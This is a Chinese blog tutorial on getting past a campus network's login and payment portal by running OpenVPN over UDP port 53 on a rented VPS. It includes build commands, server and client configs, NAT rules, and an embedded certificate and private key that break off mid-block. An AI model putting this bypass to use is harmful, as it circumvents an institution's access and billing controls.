这篇文章发表于 1744 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
上学期的时候我悄咪咪地搞了一个vps,通过UDP53端口绕过了校园网,也就不用付学校钱了,但是当时偷了懒,使用了别人提供的一键脚本。
结果昨天随便一看那个vps的情况,woc十来个CVE。。。
这安得什么心呐……mdzz再见了您呐。然后我重装了vps的系统。
故事开始了——
ps:文章已经过多次修正,请放心食用 ( ﹁ ﹁ ) ~→
简单介绍与思路 由于种种原因,好多人就单纯以为VPN是专门用来xx的,其实这只是其中的一个用途之一。但是好多人将那些科学的代理软件(像酸酸乳之类的)和VPN这个概念直接混为一谈,这是不对的。具体区别自己去理解。
建议先看完这一篇文章 。(貌似现在链接已经挂了2333)
至于原理——像学校这样的网络认证会在你登录认证界面之前建立起联系,某个路由器会记录下你的电脑的Mac地址,然后对照里面的Mac-IP对应关系表,如果不存在这个Mac就添加一条路由记录,然后在你认证前应该就已经有了一个指定的IP地址,这样才能够访问认证界面(此时你电脑与作为网关的路由器等等已在同一内网中,自然能够访问内网上的认证服务),所以你的机器在尚未认证的时候就已经存在能够直接和路由(也就是一个网关)通信的能力。
至于为什么没填账号密码就无法上网是因为没填的时候存在防火墙规则将相应的流量阻拦了。而一般来说这个规则会漏掉UDP53端口(因为要为DNS服务器开放),所以即便没有在登录界面填写账号密码,防火墙也并不会阻拦。 于是存在绕过的可能性。当然你可能会问为什么UDP67,68和69端口(和DHCP相关的端口)等等没开放,我不知道,但应该和学校的认证机制有关系。
如上图,UDP53端口处于filtered状态,但至少有反应。。(可以看出UDP1103貌似也处于开启的状态,那么这个端口能否实现绕过呢?自行探索吧hhh
ps:突然想起某人说改变Mac地址就能够躲避追踪啥的,其实没用的。因为每过一个网关,包头上面的旧Mac信息就会被丢弃,取而代之的是网关的Mac ,也就是说Mac地址没那么容易就暴露,改变自己的Mac地址不过是再加一重小保险而已。只要能找到你的第一个网关上的路由信息,基本上已经能够稳稳定位了。
好了,我们已经知道为什么有机会能够实现绕过了,那么接下来怎么绕过呢?很简单,内网穿透即可——FRP等工具皆可,甚至自写个通信脚本应该都可以通过UDP53而不被察觉。另外,其实不用穿透UDP53方法其实也可以,DNS隧道(我大一下学期试了下)能穿透,但是流量只有可怜的30K左右(这种办法较繁杂,而且丢包严重,直接被放弃)。
这里使用开源的openVPN来搭建一个隧道,个人觉得openVPN是一个强大的组网工具。
这里可能会有人对网速有疑问——经过观察,起主要限速 作用的是自己的vps的带宽 。像我买个阿里云每月10块左右的学生机(每月最多1000G,一般每月也就用4%),最大有600+K/s,B站看720p的1.5倍速视频几乎不会卡顿(其实看1080p也不会卡)。
接下来谈谈通过UDP53端口实现的操作。
服务端的搭建 这里你先要有一个vps,最好离学校地理距离近一点(减小延迟?)。
我首先尝试了使用docker来搭一个openVPN服务器,能够成功访问到docker的内部网络,但是没法通过它来访问外部网站,于是乎最后放弃这种方案(现在想想应该只是里面路由没配置好)。
以下可行操作基于centos7.3。大部分命令摘自这篇文章 。
a.生成密钥对 1 2 3 4 5 6 7 8 9 10 11 12 13 cd /rootwget https://codeload.github.com/OpenVPN/easy-rsa-old/zip/master mv master easy-rsa-old-master.zip unzip -d /usr/local / easy-rsa-old-master.zip cd /usr/local /easy-rsa-old-master/easy-rsa/2.0/ln -s openssl-1.0.0.cnf openssl.cnf vi vars source vars./clean-all ./build-ca ./build-key-server server ./build-key client ./build-dh
openVPN的通信加密基于这样一对密钥。接下来安装openVPN。
b.编译安装 OpenVPN 1 2 3 4 5 6 7 8 cd /rootwget https://swupdate.openvpn.org/community/releases/openvpn-2.4.4.tar.gz yum install -y lzo lzo-devel openssl openssl-devel pam pam-devel net-tools git lz4-devel tar xf /opt/soft/openvpn-2.4.4.tar.gz -C /usr/src/ cd /usr/src/openvpn-2.4.4./configure --prefix=/usr/local /openvpn make make install
产生错误请自行排除。另外,建议openVPN版本为2.4.6及以上,版本过低会存在一定风险。当然高版本也有一些烦人的问题,主要是与ipad端会出现问题(比如2.4.10会出错,其他版本未知,但2.4.4不会)。
c.配置服务端 1 2 3 4 5 6 mkdir -p /etc/openvpn mkdir -p /etc/openvpn/pki /usr/local /openvpn/sbin/openvpn --genkey --secret ta.key mv ./ta.key /etc/openvpn/pki cp /usr/local /easy-rsa-old-master/easy-rsa/2.0/keys/{ca.key,ca.crt,server.crt,server.key,dh2048.pem} /etc/openvpn/pki/ cp /usr/src/openvpn-2.4.4/sample/sample-config-files/server.conf /etc/openvpn/
d.文件与路由配置 注意这部分开始和那篇博文的操作有所不同了,你可以试试按照那篇博文的配置会产生什么效果。
编辑服务端配置文件 /etc/openvpn/server.conf
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 port 53 proto udp dev tun ca /etc/openvpn/pki/ca.crt cert /etc/openvpn/pki/server.crt key /etc/openvpn/pki/server.key dh /etc/openvpn/pki/dh2048.pem server 10.8.0.0 255.255.255.0 ;ifconfig-pool-persist ipp.txt ;push "route 10.0.0.0 255.0.0.0" ;push "route 192.168.8.0 255.255.255.0" push "redirect-gateway def1" push "dhcp-option DNS 8.8.8.8" client-to-client duplicate-cn keepalive 10 120 tls-auth /etc/openvpn/pki/ta.key 0 cipher AES-256-CBC comp-lzo max-clients 50 user nobody group nobody persist-key persist-tun status /var/log /openvpn-status.log log /var/log /openvpn.loglog-append /var/log /openvpn.log verb 3
以上的配置不清楚的话建议自行查找了解功能,我太菜了不敢瞎说。
然后开启内核路由转发功能:
1 2 echo net.ipv4.ip_forward = 1 >> /etc/sysctl.confsysctl -p
配置iptables策略(注意,这些规则在vps重启后很可能会消失——若重启vps后发现能连上VPN但无法访问任何网站,很可能这里出了问题 ):
1 2 3 4 5 6 systemctl enable iptables systemctl start iptables iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j SNAT --to-source 172.24.47.200 iptables-save > /etc/sysconfig/iptables service iptables restart
其中的172.24.47.200是ifconfig中的eth0的ip地址。 如果最后挂上VPN后并不能访问外部网络,排除其他原因,那么基本上是这里配置出错了。
创建openvpn的systemd unit
文件,也就是新建/usr/lib/systemd/system/openvpn.service
:
1 2 3 4 5 6 7 8 9 10 11 12 13 [Unit] Description=openvpn After=network.target [Service] EnvironmentFile=-/etc/openvpn/openvpn ExecStart=/usr/local /openvpn/sbin/openvpn --config /etc/openvpn/server.conf Restart=on-failure Type=simple LimitNOFILE=65536 [Install] WantedBy=multi-user.target
启动并设置为开机启动:
1 2 systemctl start openvpn systemctl enable openvpn
到了这一步,服务端的配置已经结束了,再确认vps上面的对应端口防火墙放行,随后运行openvpn:service openvpn start
即可。
接下来是本地客户端的配置。
客户端配置 客户端安装后(安装没啥难度不多说了),需要在安装目录下的 config
目录下创建客户端的配置文件 client.ovpn
具体内容如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 client dev tun proto udp remote xxx.xxx.xxx.xxx 53 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client.crt key client.key remote-cert-tls server tls-auth ta.key 1 cipher AES-256-CBC comp-lzo verb 3
在/usr/local/easy-rsa-old-master/easy-rsa/2.0/keys
和/etc/openvpn/pki
两个文件夹里找到并下载之前生成的ca.crt
,client.crt
,client.key
,ta.key
,然后放在client.ovpn
同级目录下,这时其实已经成功了。
不过有时候可能嫌这么多文件分发给别人比较麻烦,这时我们可以选择将其整合一下,就能让它变成单个配置文件 client-allinone.ovpn
具体格式如下(已做脱敏处理,不要打歪主意哦~):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 client dev tun proto udp remote xxx.xxx.xxx.xxx 53 resolv-retry infinite nobind persist-key persist-tun <ca> -----BEGIN CERTIFICATE----- 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 -----END CERTIFICATE----- </ca> <cert> Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: sha1WithRSAEncryption Issuer: C=CN, ST=BJ, L=BeiJing, O=CTSIG, OU=changeme, CN=changeme/name=changeme/emailAddress=ucasz@example.domain Validity Not Before: Feb 26 02:29:57 2020 GMT Not After : Feb 23 02:29:57 2030 GMT Subject: C=CN, ST=BJ, L=BeiJing, O=CTSIG, OU=changeme, CN=server/name=changeme/emailAddress=ucasz@example.domain Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (4096 bit) Modulus: 00:9f:cf:52:4c:d3:1d:5d:63:82:27:f7:7a:89:5b: d5:44:df:68:7d:b6:60:bb:a6:a5:d3:fa:64:59:ed: ad:cf:4c:ae:22:20:d7:01:e8:b4:7d:e2:d0:20:6e: a8:11:f4:96:5c:e3:f4:de:2e:57:65:e5:2b:e7:da: 24:ec:53:ff:5d:11:3e:2e:34:34:e9:86:28:49:5e: bd:e3:4e:a5:d8:bc:12:70:d5:4b:a4:b1:25:3f:f2: b5:57:41:e9:1e:f2:46:67:f4:98:fc:35:b6:b7:f2: 0f:cf:34:9d:53:63:53:1c:c4:0f:79:31:a0:3e:a9: 0e:3e:72:95:18:3f:f0:af:7a:44:26:15:43:84:8a: 2f:e6:b5:9b:96:e8:07:1e:4d:da:e0:4b:94:72:d6: 44:f6:b0:fe:72:17:fe:03:1b:38:bc:fc:58:20:da: 41:3d:3f:fb:27:27:35:3c:4e:18:93:03:b3:62:c3: 82:29:3d:67:4d:cf:31:3e:64:c9:14:5d:49:88:e4: e8:08:16:34:6c:e7:d2:e8:57:e6:73:b0:02:67:25: 99:a3:16:4f:56:2d:c4:49:0c:77:23:28:bf:d9:dd: 45:c4:98:57:21:d5:df:f1:6e:4e:10:ed:a6:e1:a5: 10:ad:31:71:91:9d:45:e5:cb:23:b1:1b:a1:74:8d: c3:fa:2f:48:69:f7:b0:30:8f:8c:30:e2:85:27:b4: 66:95:e6:86:6f:2b:96:94:2f:c9:9a:89:b8:4c:5d: 7e:e6:e2:d6:c1:cc:65:f6:0f:c8:3b:be:44:08:92: 61:38:4f:18:9f:1b:55:b8:2e:40:26:4a:44:e0:a9: 41:9f:d0:ac:fb:f2:35:c7:be:2d:43:3d:45:bb:79: e8:c1:a0:26:4c:35:e4:e8:46:56:29:ef:c5:c1:f8: 0d:a1:a7:55:c0:db:c7:50:b9:db:65:9d:eb:fe:fe: 1c:d8:8b:7a:60:dd:4d:b1:d5:0a:d1:79:ae:fe:cf: f1:06:f8:36:ef:c1:c0:31:32:d4:2b:a9:4f:71:2e: d9:38:94:4a:c8:3d:f7:7a:53:a1:0f:09:3c:9e:44: 69:61:c3:98:fe:42:6f:48:21:4d:33:1a:b7:fb:c6: 54:18:05:97:b3:36:92:fe:a7:20:65:cf:9a:56:3c: 4c:3f:b7:26:5d:07:95:55:dc:be:4e:62:e0:29:fb: fb:8f:5b:3e:cd:47:f1:33:4d:b4:2a:ab:67:f1:2d: a5:2c:3f:d7:da:ce:d0:da:cb:1c:d6:cf:6c:6f:aa: c3:09:12:4e:e7:0f:30:7f:2d:67:68:e1:5f:d3:44: 03:26:56:ce:28:aa:98:4f:82:24:80:76:6e:96:26: 19:97:f7 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Basic Constraints: CA:FALSE Netscape Cert Type: SSL Server Netscape Comment: Easy-RSA Generated Server Certificate X509v3 Subject Key Identifier: BB:CC:18:46:E1:5D:B5:CB:5E:44:91:57:75:08:D1:EE:02:BF:93:F0 X509v3 Authority Key Identifier: keyid:93:44:9F:65:44:9C:61:60:A5:34:BF:E5:EE:0E:17:2C:D6:67:6B:E0 DirName:/C=CN/ST=BJ/L=BeiJing/O=CTSIG/OU=changeme/CN=changeme/name=changeme/emailAddress=ucasz@example.domain serial:C7:07:F3:23:0D:BA:77:FE X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Key Usage: Digital Signature, Key Encipherment Signature Algorithm: sha1WithRSAEncryption b8:b2:0d:1c:36:52:b7:54:12:f5:10:8f:39:da:ee:95:1e:17: 0b:fd:44:00:17:0f:3d:3f:6d:e0:22:91:b0:0f:0f:e5:2d:9b: a1:38:24:a6:77:c4:4a:6f:7a:c5:dc:40:a1:73:eb:54:2a:29: 7f:e5:7a:7a:00:d3:48:b9:15:b3:68:79:59:ae:c9:8d:c2:d9: d9:ae:88:73:0f:93:3e:5b:dd:ad:a4:f2:23:3b:29:e1:52:1d: 95:ce:30:ea:7b:4a:42:d7:61:35:48:a9:0c:eb:21:fd:66:1d: 6f:62:24:dd:62:f0:76:1e:de:c5:73:ee:90:23:48:d8:2b:94: d0:0e:bb:2f:34:dc:ad:31:b3:52:37:82:f9:45:a6:ba:27:d4: 37:11:99:0b:e1:09:b9:69:2e:61:c9:2c:d1:e6:f8:fe:73:31: a8:cf:e2:41:73:b6:88:a1:4e:4e:8d:56:3c:cb:11:2d:e3:3e: 0a:d0:5a:67:38:c3:b8:11:25:8e:ea:b4:28:78:df:97:5b:be: 2e:19:90:08:1c:5d:47:db:76:c0:b2:e4:1f:fb:3c:08:a9:f9: 38:ca:0f:83:c1:f8:dc:b0:d9:05:5a:e2:a4:70:55:ec:ad:70: bd:b0:14:69:77:32:3c:80:3b:df:76:87:e7:7b:92:fb:a0:14: e9:6b:6d:8f:0a:27:68:83:c8:68:1b:44:a3:9e:10:e9:1b:7c: c4:b4:18:e7:3e:82:3d:9a:75:0e:5a:b5:a5:3a:64:d0:32:49: 7b:bd:ef:63:cf:b9:25:b4:fa:a3:7a:fd:1c:ed:4b:d6:cd:5e: 00:dd:7b:56:48:ed:c2:7f:27:f5:78:48:59:f0:44:48:60:99: 0a:b8:e2:33:4e:b0:ab:8b:d1:c1:c2:fa:53:3b:6c:84:c6:14: 70:03:a9:15:25:74:c9:31:b2:8a:2c:2e:14:04:cc:a8:36:6d: 07:6e:fc:38:64:a7:f0:06:76:f3:e6:fb:7b:d9:11:d3:a4:3e: 06:ec:00:b1:7a:6c:02:e6:df:23:45:13:4b:00:ce:eb:f2:b8: 9e:e1:47:97:90:1b:e0:5f:79:d5:e9:5b:7e:fe:ff:1f:17:8d: cb:93:bf:94:09:19:65:06:3d:2b:d3:87:4e:d2:8e:82:53:89: bb:73:80:a2:d5:2e:2d:d4:71:f3:6c:b3:37:06:12:3a:bf:13: 68:a2:df:e5:19:81:ff:9f:5a:12:f2:bc:4f:86:31:b8:a8:ef: 10:e9:97:a7:b3:c2:25:e8:b6:9a:a0:6a:ed:eb:d3:cc:58:59: ec:04:f5:0a:95:00:7e:31:7c:7c:e5:4a:86:eb:48:ec:b9:ad: 42:81:e0:0b:13:5b:9e:d0 -----BEGIN CERTIFICATE----- MIIG9jCCBN6gAwIBAgIBAjANBgkqhkiG9w0BAQUFABCDljELMAkGA1UEBhMCQ04x CzAJBgNVBAgTAkJKMRAwDgCWUQQHEwdCZWlKaW5nMQ4wDAYDVQQKEwVDVFNJRzER MA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1lMREwDwYDVQQpEwhj aGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRvbWFpbjAeFw0yMDAy MjYwMjMwNDNaFw0zYDAyMjMwMjMwNDNaMIGUMQswCQYDVQQGEwJDTjELMAkGA1UE CBMCQkoxEDAOBgNVBAcTB0JlaUppbmcxDjAMBgNVBAoTBUNUU0lHMREwDwYDVQQL EwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xpZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEf MB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRvbWFpbjCCAiIwDQYJKoZIhvcNAQEB BQADggIPADCCAgoCggAMBVv+4ElnpSTR/RLYrh9q0k+tlUEZknL/3PaoILSEuDxq yOpV21QdvmAs86nnkSXzcinmn/hnc37lX2gIDrSfhyKRkq5qiTV81l6FFrwgAYUe K7LFZLMjHNTsHHoLSlz13VYZ0lBfBl3+d3yDUhYMtJDHBSiE7CN3AGqVtlOaVq+/ 9kxI3LdHhPADpkvoL68Uggn+4gPL1pAGATad1sy4tbAuokLCp1DjZhCaWxvAI8zj PFSgPYReQtPY8P46Z/wRUsB6N/9iUKZthGBCmXfWQj8xyXggLP70KgX7nc9Je+Rb TTMp/M0Vzvss4P62x/kavuJ9Hz8Rsp7DW3zgND7G8HoLL5LfMmMthOEcT8RfCmla ufgCHO2Lfp0d8e9l8/9UdHfAg0vrZMnvglm5NpsuFv2F0U1m9ivAVm8qOeP0/UVx ABUgL8cNOJKMSi5dcYVHKlIGreq/CcNRypn0/IBUOgqSCUNE9DtxjIiP+59a7AhI RABnObIo3pi+VliFHKk9UrvPLRYkkPCx01jc8QzhTlLQPMc/xJJpbgPSYFcyPWML YkCGlcpYkDfkr//Tj6c0yd8BNoN3H3a4j4kYvg2+3sWAwMdqfhSOBb9JFOZGEHlo Nf6mqk7H1+hwgbZnuFuQEKHRt43i7uWqln32jP0ZPcbJPptcFIBtlVKgWlC5xWl7 AgMBAAGjggFNMIIBSTAJBgNVHRMEAjAAMC0GCWCGSAGG+EIBDQQgFh5FYXN5LVJT QSBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFNyQqVYV1ydpjfCLCccJ 93uX8lb4MIHLBgNVHSMEgcMwgcCAFJNEn2VEnGGApTS/5f4OFyzWZ2vgoYGcpIGZ MIGWMQswCQYDVQQGEwJDTjELMAkGA1UECBMCQkoxEDAOBgNVBAcTB0JlaUppbmcx DjAMBgNVBAoTBUNUU0lHMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMIY2hh bmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWlsQGhv c3QuZG9tYWluggkAxwfzIw26d/4wEwYDVR0lBAwwCgYIKwYBBQUHAwIwCwYDVR0P BAQDAgeAMA0GCSqGSIb3DQEBBQUAA4ICAQC5lP/aqZZgWwWEq4oyEEFLN2JIVOnu 5BYs1uUstIhPZiejujEoSZlaEEm24RPTMt1Fj+BjGJsNb8ge1AfKZKnsWnSndOtL h7bv6fHogCMPMo91K9GDSpGrX12Fyb5vXYyaa9syiAS/9u32DX/VS2Jfp1rZIlL6 VE0YJhNIV0+ejuB/pIe/2ZCZKli2Y3+kL21XLrNbLO9DiEHjBcWKJ9Pjpc3x6Lmr PseDByfd4oSI5Tk79nQJCvERGAWtmTnOfdE7lV/UUDi+sIUAq//1rZe6mqhLIYdb 5K90wpbT4xc51BFLZfIkvUOAw0f/i2niD36st7QsinWtrQdlARD7Osv/1Ornk5R7 DqHQqnhRG0gPt3OlfVp4KTULLEWelHGqI8ODQND4m8Xy6vklpkmqug+TBw+UlxBk ObEonzoDG+VMXja9BWZlT+Uah6VitcbjlGAnkncxnzGUGaKk2qkmhZwFEqt5KfYi +BRfx201g2JXxpl/LT20pOQ9zziZ0jzPPMsNk25iV6N9M7JTpODdkrmBbEd359pf 21r/zh12334V1TaxP8wgh5QzNwyIg5FhkFsKLtZuKRlXbK0hd4l8v4C0fxf/kRde zlqjIndZUf1R/B456OBODIQf3iJ9fHw+5KEspogbK2lWGXqOFzHmtpI0z4S/rHG8 Ojm/PKW2BCGChA== -----END CERTIFICATE----- </cert> <key> -----BEGIN PRIVATE KEY----- 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 